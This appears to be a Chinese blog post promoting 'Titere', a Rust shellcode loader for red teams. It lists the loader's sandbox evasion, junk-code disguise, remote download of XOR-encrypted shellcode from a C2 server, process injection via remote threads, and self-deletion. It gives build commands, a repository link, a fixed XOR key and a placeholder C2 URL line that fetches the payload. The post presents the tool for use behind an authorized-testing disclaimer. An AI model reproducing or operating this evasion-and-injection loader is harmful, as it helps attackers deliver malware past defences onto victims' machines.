首页 渗透工具 正文
  • 本文约1097字,阅读需5分钟
  • 25
  • 0

Titere - 高级Shellcode加载器

一个集成了多种高级反检测技术的 Rust Shellcode 加载器,专为红队渗透测试设计。

🎯 核心功能

主程序 (src/main.rs) - Shellcode加载器

  • 沙箱对抗:运行时间检测、用户交互检测、环境特征检测、进程检测
  • 行为伪装:延迟执行、正常文件访问、多态垃圾代码、假解密操作
  • Shellcode加载:远程下载、XOR解密、进程注入执行
  • 自清理:执行后自删除、痕迹清理

加密工具 (encrypt_project/src/main.rs) - Shellcode加密器

  • Shellcode处理:自动检测.bin文件、XOR加密处理
  • 数据混淆:固定密钥加密、批量文件处理

🛠️ 技术架构

Shellcode加载流程

  1. 沙箱检测 - 确保在真实环境中执行
  2. 行为伪装 - 混淆真实意图
  3. 远程获取Shellcode - 从C2服务器下载加密数据
  4. XOR解密Shellcode - 使用固定密钥解密
  5. 进程注入执行 - 注入目标进程并执行

沙箱检测技术

  • 系统运行时间检测
  • 用户交互检测
  • 环境特征检测
  • 沙箱进程检测

进程注入技术

  • 远程内存分配
  • 写入shellcode
  • 创建远程线程执行

🚀 快速开始

环境要求

  • Windows 操作系统
  • Rust 开发环境

编译安装

# 克隆项目
git clone https://github.com/9Insomnie/TitereV1.0.git
cd Titere

# 编译主程序
cargo build --release

# 编译加密工具
cd encrypt_project
cargo build --release

使用方法

Shellcode加载器

# 直接运行
cargo run

# 或运行编译后的可执行文件
./target/release/loader.exe

Shellcode加密器

cd encrypt_project
cargo run

🔧 配置说明

C2服务器配置

修改 src/main.rs 中的C2服务器地址:

let url = "http://your-c2-server.com:port/output.bin";

加密密钥

默认XOR密钥:[0x1A, 0x2B, 0x3C, 0x4D, 0x5E, 0x6F, 0x7A, 0x8B]

🎯 红队使用场景

  1. 初始访问:绕过沙箱检测,加载初始shellcode
  2. 权限提升:注入高权限进程,执行提权shellcode
  3. 横向移动:远程代码执行,进程间shellcode传播
  4. 持久化:隐蔽shellcode加载,维持访问

📊 技术细节

多态代码技术

  • 模拟数学计算
  • 模拟字符串处理
  • 模拟数组操作
  • 模拟时间获取

自删除技术

  • 延迟3秒后删除自身文件
  • 使用cmd命令执行删除操作

⚠️ 重要声明

本工具仅用于授权的红队渗透测试。使用者必须获得目标系统的明确授权,并遵守相关法律法规。作者不承担任何因非法使用而产生的法律责任。

温馨提示:本文最后更新于2025年8月3日 02:08,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论